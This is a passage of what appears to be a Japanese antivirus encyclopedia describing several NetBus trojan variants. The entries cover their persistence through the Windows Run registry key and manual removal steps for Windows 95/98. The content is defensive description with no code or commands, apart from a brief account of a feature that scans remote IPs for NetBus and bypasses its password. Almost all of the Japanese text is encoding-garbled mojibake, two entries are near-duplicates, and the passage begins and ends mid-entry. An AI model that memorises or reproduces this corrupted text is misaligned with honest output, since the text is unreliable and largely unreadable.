Ž¡ ¤½¤Î¸å¡¢PATCH.exe, KEYHOOK.DLL¤òºï½ü¤¹¤ë¡£

TROJ_NETBUS.20.S


̾¡¡¡¡¾Î:TROJ_NETBUS.20.S

ÊÌ¡¡¡¡Ì¾:TROJ_NETBUS.20.C

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:1ޤ114ޤ112 bytes (Client)ޤ 612ޤ864
bytes (Server)
ȯ¾ÍÃÏ:ÉÔÌÀ

ȯ¸«Æü:2/19/1999

¾Ü¡¡¡¡ºÙ:¡Ý¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£TROJ_
NETBUS.20¤ÏNETBUS¥·¥ê¡¼¥º¤ÎºÇ¿·¥Ð¡¼¥¸¥ç¥ó¤ÇޤÁ°¤Î¤â¤Î ¤Èµ¡Ç½Åª¤Ë¤Ï¤Û¤È¤ó¤ÉÊѤï¤é¤Ê¤¤¤¬Ž¤¥Ñ¥Õ¥©¡¼¥Þ¥ó¥¹¤¬¸þ¾å ¤·Ž¤¶¯¸Ç¤Ê¥½¥Õ¥È¥¦¥§¥¢¤È¤Ê¤Ã¤Æ¤¤¤ëŽ¡ -¡¡NETBUS¤È¤Ï¥Í¥Ã¥È¥ï¡¼¥¯¤ò²ð¤·¤Æ¥Þ¥·¥ó¤ò¥ê¥â¡¼¥È¥³¥ó ¥È¥í¡¼¥ë¤¹¤ë¤¿¤á¤Î¥µ¡¼¥Ð¡¼kŽ¥¥¯¥é¥¤¥¢¥ó¥È·¿¥×¥í¥°¥é¥à ¤Ç¤¢¤ëŽ¡ÉÔÀµ¿¯Æþ¤ò¿Þ¤ë¥Ï¥Ã¥«¡¼¤Ïޤ¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à( TROJ_NETBUS.20.S)¤ò¥æ¡¼¥¶¡¼¤Ë¥¤¥ó¥¹¥È¡¼¥ë¤µ¤»¤ë¤³¤È¤Ç ޤ¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à(TROJ_NETBUS.20.C)¤«¤é¥æ¡¼¥¶ ¡¼¤Î¥Þ¥·¥ó¤ò¾¡¼ê¤Ë¥³¥ó¥È¥í¡¼¥ë¤¹¤ë¤³¤È¤¬¤Ç¤­¤ëŽ¡ ¡Ý¡¡TROJ_NETBUS.20.S¤Î¥×¥í¥°¥é¥à¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë ¤È¡¢¤³¤Î¥È¥í¥¤¤ÎÌÚÇϤώ¤Windows OS¤Î¥¤¥ó¥¹¥È¡¼¥ë¥Ç¥£¥ì
¥¯¥È¥ê(Îã:C:\Windows)¤ÎÃæ¤Ë<¥ª¥ê¥¸¥Ê¥ë¥Õ¥¡¥¤¥ë̾>.EXE
ޤ KEYHOOK.DLL¤ÎÆó¤Ä¤Î¥Õ¥¡¥¤¥ë¤òºîÀ®¤¹¤ëŽ¡¤Þ¤¿Ž¤¥ì¥¸¥¹¥È ¥ê¤Î \\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\run¤ËÅÐÏ¿¤·Ž¤¼¡²ó¥Þ¥·¥óµ¯Æ°»þ¤«¤é¼«Æ°Åª ¤Ë¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¤è¤¦¤ËÀßÄꤹ¤ë¡£¥×¥í¥°¥é¥à¼Â ¹ÔÃæ¤Ï¥Õ¥¡¥¤¥ë¤Îºï½ü¤¬¤Ç¤­¤Ê¤¤Ž¡
¾É¾õ:
Troj_Netbus.20.C¤ò¥¤¥ó¥¹¥È¡¼¥ë¤·¤¿ÉÔÀµ¿¯Æþ¤ò¿Þ¤ë¥Ï¥Ã ¥«¡¼¤Ïޤ¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤Æ¤¤¤ë¥Þ¥·¥ó¤Ë¥ê¥â ¡¼¥È¥¢¥¯¥»¥¹¤·¤ÆŽ¤¥·¥¹¥Æ¥à¥Õ¥¡¥¤¥ë¤«¤é¥Þ¥¦¥¹¤ÎÁàºî¤Þ¤Ç ¼«Í³¤ËÁà¤ë¤³¤È¤¬¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ëŽ¡
È÷¡¡¡¡¹Í:-¡¡¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à̾¤Ï"NetBus.exe"Ž¡
¥µ¡¼¥Ð¡¼¤Î¥×¥í¥°¥é¥à̾¤Ï"Patch.exe"¤À¤¬Ž¤¤³¤Î̾Á°¤Ï¼« ͳ¤ËÊѹ¹¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¤Î¤ÇޤÁ÷¤é¤ì¤¿Áê¼ê¤Ë¤½¤ì¤È¤ÏÃÎ ¤é¤º¤Ë¼Â¹Ô¤µ¤»¤ë¤³¤È¤¬¤Ç¤­¤ëŽ¡
ÂнèÊýË¡:
¥¦¥¤¥ë¥¹¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ëޤ¼«Æ°µ¯Æ°¤ÎÀßÄê¤ò¹Ô¤¦¤¿¤áޤ ¥¦¥¤¥ë¥¹¥Ð¥¹¥¿¡¼¤Þ¤¿¤ÏWINDOWS¾å¤«¤é¤Ï¥Õ¥¡¥¤¥ë¤òºï½ü¤¹ ¤ë¤³¤È¤Ï¤Ç¤­¤Ê¤¤Ž¡°Ê²¼¤ÎÊýË¡¤Ç¼«Æ°µ¯Æ°¤ò²ò½ü¤·Ž¤¥Õ¥¡¥¤ ¥ë¤òºï½ü¤¹¤ëŽ¡ Ãí°Õ)¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Î̾¾Î¤Ï¼«Í³¤ËÊѹ¹¤Ç¤­¤ë¤Î ¤ÇÆÃÄê¤Ï¤Ç¤­¤Ê¤¤Ž¡¥ì¥¸¥¹¥È¥ê¤Ë¤Ï޳޲ŽÙ޽ŽÊŽÞ޽ŽÀް¤Ç¸¡½Ð¤µ¤ì¤¿ ¥Õ¥¡¥¤¥ë̾¤ÇÅÐÏ¿¤µ¤ì¤Æ¤¤¤ëŽ¡¤³¤³¤Ç¤Ï"patch.EXE"¤ÇÀâÌÀ ¤¹¤ëŽ¡ ¡üWINDOWS95¤Î¾ì¹ç ¥ì¥¸¥¹¥È¥ê¤Î\\HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\run¤ÎÃæ¤Î¥­¡¼
"patch"¤òºï½ü¤¹¤ëŽ¡¤½¤Î¸åޤºÆµ¯Æ°¤·Ž¤C:\WINDOWS\patch.
EXE¤ÈޤKEYHOOK.DLL¤òºï½ü¤¹¤ëŽ¡ ¡üWINDOWS98¤Î¾ì¹ç Ž¢¥¹¥¿¡¼¥ÈŽ£¢ªŽ¢¥×¥í¥°¥é¥àŽ£¢ªŽ¢¥¢¥¯¥»¥µ¥êŽ£¢ªŽ¢¥·¥¹¥Æ¥à¥Ä ¡¼¥ëŽ£¢ªŽ¢¥·¥¹¥Æ¥à¾ðÊ󎣤ò³«¤­Ž¤Ž¢¥Ä¡¼¥ëŽ£¢ªŽ¢¥·¥¹¥Æ¥àÀßÄê¥æ ¡¼¥Æ¥£¥ê¥Æ¥£Ž£¤ÎŽ¢¥¹¥¿¡¼¥È¥¢¥Ã¥×Ž£¥¿¥Ö¤òÁª ¤ÖŽ¡¤³¤³¤Ëޤ"patch"¤¬ÅÐÏ¿¤µ¤ì¤Æ¤¤¤ë¤Î¤Ç¤½¤Î¥Á¥§¥Ã¥¯¤ò¤Ï ¤º¤¹Ž¡
¤½¤Î¸åޤºÆµ¯Æ°¤·Ž¤C:\WINDOWS\patch.EXE¤ÈޤKEYHOOK.DLL¤ò
ºï½ü¤¹¤ëŽ¡

TROJ_NETBUS.BR.C


̾¡¡¡¡¾Î:TROJ_NETBUS.BR.C

ÊÌ¡¡¡¡Ì¾:TROJ_BLADERUNNER

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows95/98

¥¦¥¤¥ë¥¹¥µ¥¤¥º:494,592¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:Windows95/98¤Çưºî¤¹¤ë¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë
¥¹¡£Back Orifice¥¦¥¤¥ë¥¹¤È»÷¤¿Æ¯¤­¤ò¤¹¤ë±ó³ÖÀ©¸æ¥Ä ¡¼¥ë¤Ç¡¢¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¡ÊTROJ_NETBUS.BR.S¡Ë¤È¥¯¥é ¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¡ÊTROJ_NETBUS.BR.C¡Ë¡¢£²¤Ä¤Î¥×¥í¥° ¥é¥à¤«¤é¤Ê¤ë¡£ ¥¤¥ó¥¿¡¼¥Í¥Ã¥È·Ðͳ¤Ç¥Ï¥Ã¥«¡¼¤Ë¥·¥¹¥Æ¥à´ÉÍý¼Ô¸¢¸Â¤È¤¤ ¤¦À©¸æ¸¢¤òÍ¿¤¨¡¢¥Í¥Ã¥È¥ï¡¼¥¯Ž¥¥»¥­¥å¥ê¥Æ¥£¤¬´í¸±¤Ë¤µ¤é ¤µ¤ì¤ë¡£ ¥æ¡¼¥¶¡¼¤¬¤¢¤ä¤Þ¤Ã¤Æ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¡ÊTROJ_NETBUS. BR.S¡Ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë(TROJ_ NETBUS.BR.C)¤ò¤â¤Ä¥Ï¥Ã¥«¡¼¤¬¥æ¡¼¥¶¡¼¤ÎPC¤Ë¥¢¥¯¥»¥¹¤· ¤Æ»×¤¤¤É¤ª¤ê¤ËPC¤òÀ©¸æ¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ë¡£ ¤³¤ì¤é¤Î¥¦¥¤¥ë¥¹¤òȯ¸«¤·¤¿¤È¤­¤Ï¡¢¤¿¤À¤Á¤Ëºï½ü¤·¤Ê¤¯ ¤Æ¤Ï¤Ê¤é¤Ê¤¤¡£¤Þ¤¿¡¢¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ø¤Î¥ê¥ó¥¯¤ò¤Ï ¤º¤¹¤¿¤á¤Ë¡¢Windows¤Î¥ì¥¸¥¹¥È¥ê¤ò¹¹¿·¤¹¤ëɬÍפ¬¤¢¤ë¡£ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ï¡¢¥¦¥¤¥ë¥¹¥³¡¼¥É¤òWindows¤Î¥µ¥Ö ¥Ç¥£¥ì¥¯¥È¥ê¤Ë¥³¥Ô¡¼¤·¡¢Windows¤Î¥ì¥¸¥¹¥È¥ê¤ò¹¹¿·¤¹¤ë ¤³¤È¤Ç¡¢Windowsµ¯Æ°»þ¤Ë¼«Ê¬¤¬Î©¤Á¾å¤¬¤ë¤è¤¦¤Ë¤¹¤ë¡£ Windows95/98¤ÏÄÌ¿®µ¡Ç½¤òÅëºÜ¤·¤¿¥Í¥Ã¥È¥ï¡¼¥¯OS¤È¤·¤Æ À߷פµ¤ì¤Æ¤ª¤ê¡¢¥·¥¹¥Æ¥à´ÉÍý¼Ô¤Ë¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Ç¤Î¥¢ ¥¯¥»¥¹¸¢¤ª¤è¤ÓÀ©¸æ¸¢¤òÍ¿¤¨¤ë¤³¤È¤¬¤Ç¤­¤ë¡£¤½¤Î¤¿¤á¡¢ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¥á¥â¥ê¡¼¾å¤Ç¼Â¹Ô¤µ¤ì¤Æ¤â¡¢¥á¥â¥ê ¡¼¤ä¥ê¥½¡¼¥¹¤ò¤ï¤º¤«¤·¤«¾ÃÈñ¤·¤Ê¤¤¤¿¤á¡¢¥æ¡¼¥¶¡¼¤Ë¤­ ¤ï¤á¤Æµ¤¤Å¤«¤ì¤Ë¤¯¤¤¡£¤Þ¤¿¡¢¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ï¡¢É¸ ½à¤Î¥·¥¹¥Æ¥à´ÉÍýµ¡Ç½¤Î¤Û¤«¤Ë¤â¡¢±ó³ÖÁàºî¤ò²Äǽ¤Ë¤¹¤ë ¤¿¤á¤Ë¡¢Ê£¿ô¤ÎÄɲõ¡Ç½¤ò¼Â¹Ô¤¹¤ë¡£ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¼Â¹Ô¤µ¤ì¤Æ¤¤¤ë¤È¡¢¥Ï¥Ã¥«¡¼¤Ï¥¯¥é ¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò»È¤Ã¤Æ¡¢¥æ¡¼¥¶¡¼¤ÎPC¤Ë¥¢¥¯¥»¥¹ ¤·¡¢¥Õ¥¡¥¤¥ë¥·¥¹¥Æ¥à¤Î²þ¤¶¤ó¡¢¥Ç¥£¥¹¥×¥ì¥¤¤Îɽ¼¨¡¢¥Þ ¥¦¥¹¥«¡¼¥½¥ë¤ÎÁàºî¤Ê¤É¡¢»×¤¤¤É¤ª¤ê¤ËPC¤òÀ©¸æ¤Ç¤­¤ë¡£

TROJ_NETBUS.BR.S


̾¡¡¡¡¾Î:TROJ_NETBUS.BR.S

ÊÌ¡¡¡¡Ì¾:TROJ_BLADERUNNER

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:Windows95/98

¥¦¥¤¥ë¥¹¥µ¥¤¥º:494,592¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:Windows95/98¤Çưºî¤¹¤ë¥È¥í¥¤¤ÎÌÚÇÏ·¿¥¦¥¤¥ë
¥¹¡£Back Orifice¥¦¥¤¥ë¥¹¤È»÷¤¿Æ¯¤­¤ò¤¹¤ë±ó³ÖÀ©¸æ¥Ä ¡¼¥ë¤Ç¡¢¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¡ÊTROJ_NETBUS.BR.S¡Ë¤È¥¯¥é ¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¡ÊTROJ_NETBUS.BR.C¡Ë¡¢£²¤Ä¤Î¥×¥í¥° ¥é¥à¤«¤é¤Ê¤ë¡£¥¤¥ó¥¿¡¼¥Í¥Ã¥È·Ðͳ¤Ç¥Ï¥Ã¥«¡¼¤Ë¥·¥¹¥Æ¥à ´ÉÍý¼Ô¸¢¸Â¤È¤¤¤¦À©¸æ¸¢¤òÍ¿¤¨¡¢¥Í¥Ã¥È¥ï¡¼¥¯Ž¥¥»¥­¥å¥ê¥Æ ¥£¤¬´í¸±¤Ë¤µ¤é¤µ¤ì¤ë¡£ ¥æ¡¼¥¶¡¼¤¬¤¢¤ä¤Þ¤Ã¤Æ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¡ÊTROJ_NETBUS. BR.S¡Ë¤ò¼Â¹Ô¤¹¤ë¤È¡¢¥¯¥é¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë(TROJ_ NETBUS.BR.C)¤ò¤â¤Ä¥Ï¥Ã¥«¡¼¤¬¥æ¡¼¥¶¡¼¤ÎPC¤Ë¥¢¥¯¥»¥¹¤· ¤Æ»×¤¤¤É¤ª¤ê¤ËPC¤òÀ©¸æ¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ë¡£ ¤³¤ì¤é¤Î¥¦¥¤¥ë¥¹¤òȯ¸«¤·¤¿¤È¤­¤Ï¡¢¤¿¤À¤Á¤Ëºï½ü¤·¤Ê¤¯ ¤Æ¤Ï¤Ê¤é¤Ê¤¤¡£¤Þ¤¿¡¢¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ø¤Î¥ê¥ó¥¯¤ò¤Ï ¤º¤¹¤¿¤á¤Ë¡¢Windows¤Î¥ì¥¸¥¹¥È¥ê¤ò¹¹¿·¤¹¤ëɬÍפ¬¤¢¤ë¡£ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ï¡¢¥¦¥¤¥ë¥¹¥³¡¼¥É¤òWindows¤Î¥µ¥Ö ¥Ç¥£¥ì¥¯¥È¥ê¤Ë¥³¥Ô¡¼¤·¡¢Windows¤Î¥ì¥¸¥¹¥È¥ê¤ò¹¹¿·¤¹¤ë ¤³¤È¤Ç¡¢Windowsµ¯Æ°»þ¤Ë¼«Ê¬¤¬Î©¤Á¾å¤¬¤ë¤è¤¦¤Ë¤¹¤ë¡£ Windows95/98¤ÏÄÌ¿®µ¡Ç½¤òÅëºÜ¤·¤¿¥Í¥Ã¥È¥ï¡¼¥¯OS¤È¤·¤Æ À߷פµ¤ì¤Æ¤ª¤ê¡¢¥·¥¹¥Æ¥à´ÉÍý¼Ô¤Ë¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Ç¤Î¥¢ ¥¯¥»¥¹¸¢¤ª¤è¤ÓÀ©¸æ¸¢¤òÍ¿¤¨¤ë¤³¤È¤¬¤Ç¤­¤ë¡£¤½¤Î¤¿¤á¡¢ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¥á¥â¥ê¡¼¾å¤Ç¼Â¹Ô¤µ¤ì¤Æ¤â¡¢¥á¥â¥ê ¡¼¤ä¥ê¥½¡¼¥¹¤ò¤ï¤º¤«¤·¤«¾ÃÈñ¤·¤Ê¤¤¤¿¤á¡¢¥æ¡¼¥¶¡¼¤Ë¤­ ¤ï¤á¤Æµ¤¤Å¤«¤ì¤Ë¤¯¤¤¡£¤Þ¤¿¡¢¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤Ï¡¢É¸ ½à¤Î¥·¥¹¥Æ¥à´ÉÍýµ¡Ç½¤Î¤Û¤«¤Ë¤â¡¢±ó³ÖÁàºî¤ò²Äǽ¤Ë¤¹¤ë ¤¿¤á¤Ë¡¢Ê£¿ô¤ÎÄɲõ¡Ç½¤ò¼Â¹Ô¤¹¤ë¡£ ¥µ¡¼¥Ð¡¼Ž¥¥â¥¸¥å¡¼¥ë¤¬¼Â¹Ô¤µ¤ì¤Æ¤¤¤ë¤È¡¢¥Ï¥Ã¥«¡¼¤Ï¥¯¥é ¥¤¥¢¥ó¥ÈŽ¥¥â¥¸¥å¡¼¥ë¤ò»È¤Ã¤Æ¡¢¥æ¡¼¥¶¡¼¤ÎPC¤Ë¥¢¥¯¥»¥¹ ¤·¡¢¥Õ¥¡¥¤¥ë¥·¥¹¥Æ¥à¤Î²þ¤¶¤ó¡¢¥Ç¥£¥¹¥×¥ì¥¤¤Îɽ¼¨¡¢¥Þ ¥¦¥¹¥«¡¼¥½¥ë¤ÎÁàºî¤Ê¤É¡¢»×¤¤¤É¤ª¤ê¤ËPC¤òÀ©¸æ¤Ç¤­¤ë¡£

TROJ_NETBUS.S


̾¡¡¡¡¾Î:TROJ_NETBUS.S

ÊÌ¡¡¡¡Ì¾:TROJ_NETBUS.C(CLIENT), TROJ_NETBUS.S(
SERVER)
ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿

ÂС¡¡¡¾Ý:¤Ê¤·

¥¦¥¤¥ë¥¹¥µ¥¤¥º:494592¥Ð¥¤¥È

¾Ü¡¡¡¡ºÙ:¡Ý¥È¥í¥¤¤ÎÌÚÇÏ·¿¥×¥í¥°¥é¥à¤Ç¤¢¤ë¡£¥È¥í¥¤¤Î
ÌÚÇÏ¥×¥í¥°¥é¥à¤ÏľÀÜ¥·¥¹¥Æ¥à¤ËÇ˲õ³èư¤ò¹Ô¤¦¤¬¡¢´¶À÷ ³èư¤Ï¹Ô¤ï¤Ê¤¤¡£ -¡¡BackOrifice¥¦¥¤¥ë¥¹¤È»÷¤¿¡¢¥Í¥Ã¥È¥ï¡¼¥¯¾å¤Î¥Ï¥Ã¥­ ¥ó¥°¥Ä¡¼¥ë¤Ç¤¢¤ë¡£¥µ¡¼¥Ð¡¼/¥¯¥é¥¤¥¢¥ó¥È·¿¤Î¥×¥í¥°¥é¥à ¤Çޤ¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤ÏTROJ_NETBUS.S,¥¯¥é¥¤¥¢¥ó¥È¥â¥¸ ¥å¡¼¥ë¤ÏTROJ_NETBUS.C¤È¤·¤Æ¸¡½Ð¤µ¤ì¤ëŽ¡ ¡Ý¡¡¥µ¡¼¥Ð¡¼¥â¥¸¥å¡¼¥ë¤Î¥Õ¥¡¥¤¥ë¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢
Windows OS¤Î¥¤¥ó¥¹¥È¡¼¥ë¥Ç¥£¥ì¥¯¥È¥ê(Îã:C:\Windows)¤Î
Ãæ¤Ë¥Õ¥¡¥¤¥ë¼«¿È¤ò¥³¥Ô¡¼¤¹¤ëŽ¡¤Þ¤¿Ž¤¥ì¥¸¥¹¥È¥ê¤Î \\HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\ CurrentVersion\run¤ËÅÐÏ¿¤µ¤ìޤ¼¡²ó¥Þ¥·¥óµ¯Æ°»þ¤«¤é¼«Æ° Ū¤Ë¥×¥í¥°¥é¥à¤¬¼Â¹Ô¤µ¤ì¤ë¡£¥×¥í¥°¥é¥à¼Â¹ÔÃæ¤Ï¥Õ¥¡¥¤ ¥ë¤Îºï½ü¤¬¤Ç¤­¤Ê¤¤Ž¡
¾É¾õ:
-¡¡Troj_Netbus.S¤¬¼Â¹Ô¤µ¤ì¤ë¤È¡¢Windows¥Ç¥£¥ì¥¯¥È¥ê¤Ë ¥³¥Ô¡¼¤µ¤ì¤Æ¡¢¤Þ¤¿¡¢Windows¤Î¥ì¥¸¥¹¥È¥ê¤ËÅÐÏ¿¤µ¤ì¤ë¡£ ¤¹¤ë¤È¡¢Windows¤¬µ¯Æ°¤¹¤ë¤È¤­¤Ë¡¢Ëè²ó¥×¥í¥°¥é¥à¤¬µ¯Æ° ¤µ¤ì¤ë¡£ Troj_Netbus.C¤ò¥¤¥ó¥¹¥È¡¼¥ë¤·¤¿°­°Õ¤ò»ý¤ÄÂè»°¼Ô¤Ïޤ¤³ ¤Î¾õÂ֤Υޥ·¥ó¤Ë¥ê¥â¡¼¥È¥¢¥¯¥»¥¹¤·¤Æ¼«Í³¤ËÁà¤ë¤³¤È¤¬ ¤Ç¤­¤ë¤è¤¦¤Ë¤Ê¤ëŽ¡
È÷¡¡¡¡¹Í:-¡¡¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à̾¤Ï"NetBus.exe"Ž¡
¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à̾¤Ï"Patch.exe"¤À¤¬Ž¤¤³¤Î̾Á°¤Ï¼«Í³ ¤ËÊѹ¹¤¹¤ë¤³¤È¤¬¤Ç¤­¤ë¤Î¤ÇޤÁ÷¤é¤ì¤¿Áê¼ê¤Ë¤½¤ì¤È¤ÏÃÎ¤é ¤º¤Ë¼Â¹Ô¤µ¤»¤ë¤³¤È¤¬¤Ç¤­¤ëŽ¡
ÂнèÊýË¡:
¥¦¥¤¥ë¥¹¥×¥í¥°¥é¥à¼Â¹Ô»þ¤Ëޤ¼«Æ°µ¯Æ°¤ÎÀßÄê¤ò¹Ô¤¦¤¿¤áޤ ¥¦¥¤¥ë¥¹¥Ð¥¹¥¿¡¼¤Þ¤¿¤ÏWINDOWS¾å¤«¤é¤Ï¥Õ¥¡¥¤¥ë¤òºï½ü¤¹ ¤ë¤³¤È¤Ï¤Ç¤­¤Ê¤¤Ž¡°Ê²¼¤ÎÊýË¡¤Ç¼«Æ°µ¯Æ°¤ò²ò½ü¤·Ž¤¥Õ¥¡¥¤ ¥ë¤òºï½ü¤¹¤ëŽ¡ Ãí°Õ)¥¯¥é¥¤¥¢¥ó¥È¥×¥í¥°¥é¥à¤Î̾¾Î¤Ï¼«Í³¤ËÊѹ¹¤Ç¤­¤ë¤Î ¤ÇÆÃÄê¤Ï¤Ç¤­¤Ê¤¤Ž¡¥ì¥¸¥¹¥È¥ê¤Ë¤Ï޳޲ŽÙ޽ŽÊŽÞ޽ŽÀް¤Ç¸¡½Ð¤µ¤ì¤¿ ¥Õ¥¡¥¤¥ë̾¤ÇÅÐÏ¿¤µ¤ì¤Æ¤¤¤ëŽ¡¤³¤³¤Ç¤Ï"patch.EXE"¤ÇÀâÌÀ ¤¹¤ëŽ¡ ¡üWINDOWS95¤Î¾ì¹ç ¥ì¥¸¥¹¥È¥ê¤Î\\HKEY_LOCAL_MACHINE\Software\Microsoft\ Windows\CurrentVersion\run¤ÎÃæ¤Î¥­¡¼"patch"¤òºï½ü¤¹¤ë
Ž¡¤½¤Î¸åޤºÆµ¯Æ°¤·Ž¤C:\WINDOWS\patch.EXE¤òºï½ü¤¹¤ëŽ¡
¡üWINDOWS98¤Î¾ì¹ç Ž¢¥¹¥¿¡¼¥ÈŽ£¢ªŽ¢¥×¥í¥°¥é¥àŽ£¢ªŽ¢¥¢¥¯¥»¥µ¥êŽ£¢ªŽ¢¥·¥¹¥Æ¥à¥Ä ¡¼¥ëŽ£¢ªŽ¢¥·¥¹¥Æ¥à¾ðÊ󎣤ò³«¤­Ž¤Ž¢¥Ä¡¼¥ëŽ£¢ªŽ¢¥·¥¹¥Æ¥àÀßÄê¥æ ¡¼¥Æ¥£¥ê¥Æ¥£Ž£¤ÎŽ¢¥¹¥¿¡¼¥È¥¢¥Ã¥×Ž£¥¿¥Ö¤òÁª¤ÖŽ¡¤³¤³¤Ëޤ" patch"¤¬ÅÐÏ¿¤µ¤ì¤Æ¤¤¤ë¤Î¤Ç¤½¤Î¥Á¥§¥Ã¥¯¤ò¤Ï¤º¤¹Ž¡¤½¤Î¸å
ޤºÆµ¯Æ°¤·Ž¤C:\WINDOWS\patch.EXE¤òºï½ü¤¹¤ëŽ¡

TROJ_NETBUS1.31


̾¡¡¡¡¾Î:TROJ_NETBUS1.31

ÊÌ¡¡¡¡Ì¾:Netbuster

ʬ¡¡¡¡Îà:¥È¥í¥¤¤ÎÌÚÇÏ·¿¡Ê¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¡Ë

¥¦¥¤¥ë¥¹¥µ¥¤¥º:489,984 bytes

¾Ü¡¡¡¡ºÙ:-¡¡
¡¡¤³¤ì¤Ï°ìÈ̤ËNetBus¤È¸Æ¤Ð¤ì¤ë¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Î°ì¼ï ¤Ç¤¹¡£¥µ¡¼¥Ð¡¼¥×¥í¥°¥é¥à¤ò¥È¥í¥¤¤ÎÌÚÇϤȤ·¤Æ¥Þ¥·¥ó¤Î ¥·¥¹¥Æ¥à¤ËÀøÆþ¤µ¤»¤¿¥Þ¥·¥ó¤ËÂФ·¡¢¤³¤Î¥×¥í¥°¥é¥à¤ò»È ÍѤ·¤Æ¥ê¥â¡¼¥ÈÁàºî¤ò¹Ô¤¤¤Þ¤¹¡£Â¾¤Î¥Õ¥¡¥¤¥ë¤Ø¤Î´¶À÷³è ư¤Ï¹Ô¤¤¤Þ¤»¤ó¡£°ì¸Ä¤Î¥×¥í¥°¥é¥à¤Ê¤Î¤Ç¶î½ü¤Ï½ÐÍè¤Þ¤» ¤ó¡£Ã±½ã¤Ë¥Õ¥¡¥¤¥ëºï½ü¤·¤Æ¤¯¤À¤µ¤¤¡£ ¡¡NETBUS¥Ï¥Ã¥­¥ó¥°¥Ä¡¼¥ë¤Î°ìÈÌŪ¤Ê¾ðÊó¤Ï¡ÖTORJ_ NETBUS.S¡×¤Î¾ðÊó¤ò¤´»²¾È¤¯¤À¤µ¤¤¡£²Ã¤¨¤ÆTROJ_NETBUS1.
31¤Ç¤Ï°Ê²¼¤ÎÆÃħ¤ò»ý¤Ã¤Æ¤¤¤Þ¤¹:
¡¦NETBUS¥¤¥ó¥¹¥È¡¼¥ë¥Á¥§¥Ã¥¯µ¡Ç½ ¡¡ÆÃÄê¤Î¥ê¥â¡¼¥ÈIP¤ËÂФ·¤ÆNETBUS¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤ ¤ë¤«¤É¤¦¤«¤òÄ´¤Ù¤Þ¤¹¡£¥¤¥ó¥¹¥È¡¼¥ë¤µ¤ì¤Æ¤¤¤¿¾ì¹ç¤Ë¤Ï ¥Ï¥Ã¥­¥ó¥°¤Ç¤­¤ë¤è¤¦¤ËÀܳ¤ò¹Ô¤¤¤Þ¤¹¡£¤³¤Î»þ¡¢¤â¤·¥Ñ ¥¹¥ï¡¼¥É¥×¥í¥Æ¥¯¥È¤¬ÀßÄꤵ¤ì¤Æ¤¤¤Æ¤âÀܳ¤·¡¢¥Ñ¥¹¥ï ¡¼¥É¤ÎÀßÄê¤òÊѹ¹¤¹¤ë¤³¤È¤¬½ÐÍè¤Þ¤¹¡£ ¡¡ ¡¦¥µ¥¦¥ó¥Éµ¡Ç½¤ÎÀßÄê¤òÊѹ¹¤¹¤ë 